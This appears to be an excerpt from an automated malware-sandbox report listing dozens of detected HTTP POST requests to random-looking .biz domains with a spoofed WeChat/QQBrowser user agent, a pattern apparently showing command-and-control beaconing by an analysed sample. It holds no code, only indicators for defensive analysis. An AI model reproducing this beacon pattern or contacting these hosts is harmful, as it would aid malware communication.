                        Source: global trafficHTTP traffic detected: POST /icvb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /mjdasdrrrpdajiq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /cpggj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ywcfdqaloklmslqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /daho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /txk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /bcfyebuhgunon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /vvpppdyli HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /wyuhsg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /fgdugwxcbebce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ahktjonxxxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /fcdeynfdvmpui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ucfcvy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /mwix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /exvjfnyxjxwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /pclybqvqlknkyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /bmriyxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /sy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /faellchgtux HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /eboqedbjpoqnvpqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dxiykgktglw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /jwx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /glpq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ymfaswtstxnaa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /vmxdnohruim HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qwtkmqbsexpiki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /nnsrvdrwdsdf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /alkfibvhvyencmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /qunavwbhgmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /boysd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /eoodskndsap HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ccgjbojtfwpjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /tqpwjhvmbc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /couv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /wa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /nmtgacidyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dkbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ghraajhdo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ubujpwkxvgqviqf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qgkrosoxeed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /gkytxybgvmhelx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /yiteaphcawxhusdi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /nfkiqboumamba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /cgfpu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /kfabynhosjjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /wcjgm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /uayanvrydqdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /nuxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /qunybk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /gu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /vne HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /mshapsve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /roupupjil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /pbcmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /megjwol HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /usismcqqdljny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /xjfegb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ls HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /gyyihnqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /obphwwtyxwxyphq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /olsalbtppedg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
